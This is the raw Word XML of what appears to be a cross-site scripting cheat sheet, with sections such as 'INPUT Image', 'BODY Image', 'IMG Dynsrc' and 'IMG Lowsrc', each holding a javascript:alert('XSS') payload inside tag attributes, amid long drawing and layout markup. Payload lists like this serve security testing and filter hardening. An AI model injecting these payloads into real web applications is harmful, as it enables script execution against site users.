                <v:shape id="Freeform 1222" o:spid="_x0000_s1216" style="position:absolute;left:1614;top:240;width:3281;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="328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zgcsgA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUvDQBCF70L/wzKCN7tpRNvGbkuRCoLQ0iiityE7&#10;ZkOzsyG7TeO/dw6Ctxnem/e+WW1G36qB+tgENjCbZqCIq2Abrg28vz3fLkDFhGyxDUwGfijCZj25&#10;WmFhw4WPNJSpVhLCsUADLqWu0DpWjjzGaeiIRfsOvccka19r2+NFwn2r8yx70B4blgaHHT05qk7l&#10;2RtYfC3nd67c7nb3+8Pn7LzU+9ePwZib63H7CCrRmP7Nf9cvVvDzXPjlGxlBr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nOByyAAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABk&#10;cnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAjQMAAAAA&#10;" path="m3260,182l21,182r-3,l,161r,-3l,21,21,,3260,r21,21l3281,161r-18,21l3260,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3260,422;21,422;18,422;0,401;0,398;0,261;21,240;3260,240;3281,261;3281,401;3263,422;3260,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1221" o:spid="_x0000_s1217" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:328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X2osMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1tQeZLcaRURBEGRrPXgcm7EN&#10;NpPaRO3++83Cwt7m8T5nvuxtI57UeeNYwWScgCAunTZcKTgV2/cPED4ga2wck4Jv8rBcDN7mmGn3&#10;4pyex1CJGMI+QwV1CG0mpS9rsujHriWO3NV1FkOEXSV1h68YbhuZJslUWjQcG2psaV1TeTs+rILV&#10;mfONuR8uX/k1N0XxmfB+elNqNOxXMxCB+vAv/nPvdJyfphP4/SaeIB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X2o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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;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INPUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2777490" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1216" name="Group 1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7490" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="4374" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1217" name="Freeform 1219"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="254"/>
                            <a:ext cx="4374" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5967 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4374"/>
                              <a:gd name="T2" fmla="+- 0 436 254"/>
                              <a:gd name="T3" fmla="*/ 436 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4374"/>
                              <a:gd name="T6" fmla="+- 0 436 254"/>
                              <a:gd name="T7" fmla="*/ 436 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4374"/>
                              <a:gd name="T10" fmla="+- 0 436 254"/>
                              <a:gd name="T11" fmla="*/ 436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4374"/>
                              <a:gd name="T14" fmla="+- 0 415 254"/>
                              <a:gd name="T15" fmla="*/ 415 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4374"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4374"/>
                              <a:gd name="T22" fmla="+- 0 275 254"/>
                              <a:gd name="T23" fmla="*/ 275 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4374"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5967 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4374"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5988 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4374"/>
                              <a:gd name="T34" fmla="+- 0 275 254"/>
                              <a:gd name="T35" fmla="*/ 275 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5988 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4374"/>
                              <a:gd name="T38" fmla="+- 0 415 254"/>
                              <a:gd name="T39" fmla="*/ 415 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5970 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4374"/>
                              <a:gd name="T42" fmla="+- 0 436 254"/>
                              <a:gd name="T43" fmla="*/ 436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5967 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4374"/>
                              <a:gd name="T46" fmla="+- 0 436 254"/>
                              <a:gd name="T47" fmla="*/ 4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374" h="183">
                                <a:moveTo>
                                  <a:pt x="435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353" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4374" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4374" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="435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Text Box 1218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4"/>
                            <a:ext cx="437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&lt;INPUT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TYPE="IMAGE"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0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SRC="javascript:alert('XSS');"&gt;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17" o:spid="_x0000_s1218" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:218.7pt;height:9.15pt;z-index:-15694848;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="437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">
                <v:shape id="Freeform 1219" o:spid="_x0000_s1219" style="position:absolute;left:1614;top:254;width:4374;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="437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fCAcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRCF7wX/Qxiht5rVQ5XVKGKp9OJh1Yu3YTMm&#10;i5vJkqTr9t83guBthvfmfW9Wm8G1oqcQG88KppMCBHHtdcNGwfn0/bEAEROyxtYzKfijCJv16G2F&#10;pfZ3rqg/JiNyCMcSFdiUulLKWFtyGCe+I87a1QeHKa/BSB3wnsNdK2dF8SkdNpwJFjvaWapvx1+X&#10;uYfA+311OcSvuDBkTTVP/aDU+3jYLkEkGtLL/Lz+0bn+bDqHxzd5BL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fCAcMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m4353,182l21,182r-3,l,161r,-3l,21,21,,4353,r21,21l4374,161r-18,21l4353,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4353,436;21,436;18,436;0,415;0,412;0,275;21,254;4353,254;4374,275;4374,415;4356,436;4353,436" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1218" o:spid="_x0000_s1220" type="#_x0000_t202" style="position:absolute;left:1614;top:254;width:437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OVgsYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UEb3WjB9HUVUQqFITSmB56nGbH&#10;ZDE7G7NbTf995yB4m+G9ee+b1WbwrbpSH11gA9NJBoq4CtZxbeCr3L8sQMWEbLENTAb+KMJm/fy0&#10;wtyGGxd0PaZaSQjHHA00KXW51rFqyGOchI5YtFPoPSZZ+1rbHm8S7ls9y7K59uhYGhrsaNdQdT7+&#10;egPbby7e3OXj57M4Fa4slxkf5mdjxqNh+woq0ZAe5vv1uxX82VRw5RsZQa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OVgs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&lt;INPUT</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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TYPE="IMAGE"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="60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SRC="javascript:alert('XSS');"&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BODY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2345690" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1213" name="Group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5690" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="3694" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1214" name="Freeform 1216"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="3694" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5287 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3694"/>
                              <a:gd name="T2" fmla="+- 0 436 254"/>
                              <a:gd name="T3" fmla="*/ 436 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3694"/>
                              <a:gd name="T6" fmla="+- 0 436 254"/>
                              <a:gd name="T7" fmla="*/ 436 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3694"/>
                              <a:gd name="T10" fmla="+- 0 436 254"/>
                              <a:gd name="T11" fmla="*/ 436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3694"/>
                              <a:gd name="T14" fmla="+- 0 415 254"/>
                              <a:gd name="T15" fmla="*/ 415 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3694"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3694"/>
                              <a:gd name="T22" fmla="+- 0 275 254"/>
                              <a:gd name="T23" fmla="*/ 275 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3694"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5287 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3694"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5308 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3694"/>
                              <a:gd name="T34" fmla="+- 0 275 254"/>
                              <a:gd name="T35" fmla="*/ 275 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5308 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3694"/>
                              <a:gd name="T38" fmla="+- 0 415 254"/>
                              <a:gd name="T39" fmla="*/ 415 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5290 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3694"/>
                              <a:gd name="T42" fmla="+- 0 436 254"/>
                              <a:gd name="T43" fmla="*/ 436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5287 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3694"/>
                              <a:gd name="T46" fmla="+- 0 436 254"/>
                              <a:gd name="T47" fmla="*/ 4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694" h="183">
                                <a:moveTo>
                                  <a:pt x="367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673" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3676" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367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Text Box 1215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3"/>
                            <a:ext cx="369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&lt;BODY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BACKGROUND="javascript:alert('XSS')"&gt;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14" o:spid="_x0000_s1221" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:184.7pt;height:9.15pt;z-index:-15694336;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="369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">
                <v:shape id="Freeform 1216" o:spid="_x0000_s1222" style="position:absolute;left:1614;top:253;width:3694;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="369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HxOsUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzJCb3WTIKFGVxEhtT3WquchOybB&#10;7GyS3SZpf323UOhthvfeN282u8k0YqDe1ZYVxIsIBHFhdc2lgvNH/vQMwnlkjY1lUvBFDnbb2cMG&#10;M21Hfqfh5EsRIOwyVFB532ZSuqIig25hW+Kg3Wxv0Ie1L6XucQxw08gkilJpsOZwocKWDhUV99On&#10;CZRjfn7r0vzlPlwp6b4vK+NXWqnH+bRfg/A0+X/zX/pVh/pJvITfb8II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AfE6xQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3673,182l21,182r-3,l,161r,-3l,21,21,,3673,r21,21l3694,161r-18,21l3673,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3673,436;21,436;18,436;0,415;0,412;0,275;21,254;3673,254;3694,275;3694,415;3676,436;3673,436" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1215" o:spid="_x0000_s1223" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:369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I6HMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TRUUrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fTmb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I6HM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&lt;BODY</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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BACKGROUND="javascript:alert('XSS')"&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>IMG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Dynsrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2083435" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1210" name="Group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3435" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="3281" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1211" name="Freeform 1213"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="3281" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4874 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3281"/>
                              <a:gd name="T2" fmla="+- 0 436 254"/>
                              <a:gd name="T3" fmla="*/ 436 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3281"/>
                              <a:gd name="T6" fmla="+- 0 436 254"/>
                              <a:gd name="T7" fmla="*/ 436 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3281"/>
                              <a:gd name="T10" fmla="+- 0 436 254"/>
                              <a:gd name="T11" fmla="*/ 436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3281"/>
                              <a:gd name="T14" fmla="+- 0 415 254"/>
                              <a:gd name="T15" fmla="*/ 415 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3281"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3281"/>
                              <a:gd name="T22" fmla="+- 0 275 254"/>
                              <a:gd name="T23" fmla="*/ 275 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3281"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4874 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3281"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4895 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3281"/>
                              <a:gd name="T34" fmla="+- 0 275 254"/>
                              <a:gd name="T35" fmla="*/ 275 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4895 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3281"/>
                              <a:gd name="T38" fmla="+- 0 415 254"/>
                              <a:gd name="T39" fmla="*/ 415 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4877 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3281"/>
                              <a:gd name="T42" fmla="+- 0 436 254"/>
                              <a:gd name="T43" fmla="*/ 436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4874 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3281"/>
                              <a:gd name="T46" fmla="+- 0 436 254"/>
                              <a:gd name="T47" fmla="*/ 4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281" h="183">
                                <a:moveTo>
                                  <a:pt x="326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260" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3263" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326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Text Box 1212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3"/>
                            <a:ext cx="328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DYNSRC="javascript:alert('XSS')"&gt;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11" o:spid="_x0000_s1224" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:164.05pt;height:9.15pt;z-index:-15693824;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="328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">
                <v:shape id="Freeform 1213" o:spid="_x0000_s1225" style="position:absolute;left:1614;top:253;width:3281;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="328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yPVMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBN8m2mVbdoZRcTBQHCsE9G3o7k1&#10;xeZSmli7/94MBnu7j+/nLVa9rUVHra8cK0jHCQjiwumKSwWHr7fHGQgfkDXWjknBD3lYLQcPC8y0&#10;u/EndXkoRQxhn6ECE0KTSekLQxb92DXEkft2rcUQYVtK3eIthttaTpLkWVqsODYYbGhjqLjkV6tg&#10;dp6/TE2+3m6f9h+n9DqX+92xU2o07NevIAL14V/8537Xcf4kTeH3m3iC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vI9UxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3260,182l21,182r-3,l,161r,-3l,21,21,,3260,r21,21l3281,161r-18,21l3260,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3260,436;21,436;18,436;0,415;0,412;0,275;21,254;3260,254;3281,275;3281,415;3263,436;3260,436" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1212" o:spid="_x0000_s1226" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:328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uiaMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1tQeZLcaRURBEGRrPXgcm7EN&#10;NpPaRO3++83Cwt7m8T5nvuxtI57UeeNYwWScgCAunTZcKTgV2/cPED4ga2wck4Jv8rBcDN7mmGn3&#10;4pyex1CJGMI+QwV1CG0mpS9rsujHriWO3NV1FkOEXSV1h68YbhuZJslUWjQcG2psaV1TeTs+rILV&#10;mfONuR8uX/k1N0XxmfB+elNqNOxXMxCB+vAv/nPvdJyfTlL4/SaeIB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uiaM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7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DYNSRC="javascript:alert('XSS')"&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IMG Lowsrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2083435" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1207" name="Group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3435" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="3281" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1208" name="Freeform 1210"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="3281" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4874 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3281"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3281"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3281"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3281"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3281"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3281"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3281"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4874 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3281"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4895 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3281"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4895 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3281"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4877 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3281"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4874 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3281"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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281" h="183">
                                <a:moveTo>
                                  <a:pt x="326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260" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3263" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326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9" name="Text Box 1209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1"/>
                            <a:ext cx="328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LOWSRC="javascript:alert('XSS')"&gt;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08" o:spid="_x0000_s1227" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:164.05pt;height:9.15pt;z-index:-15693312;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="328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">
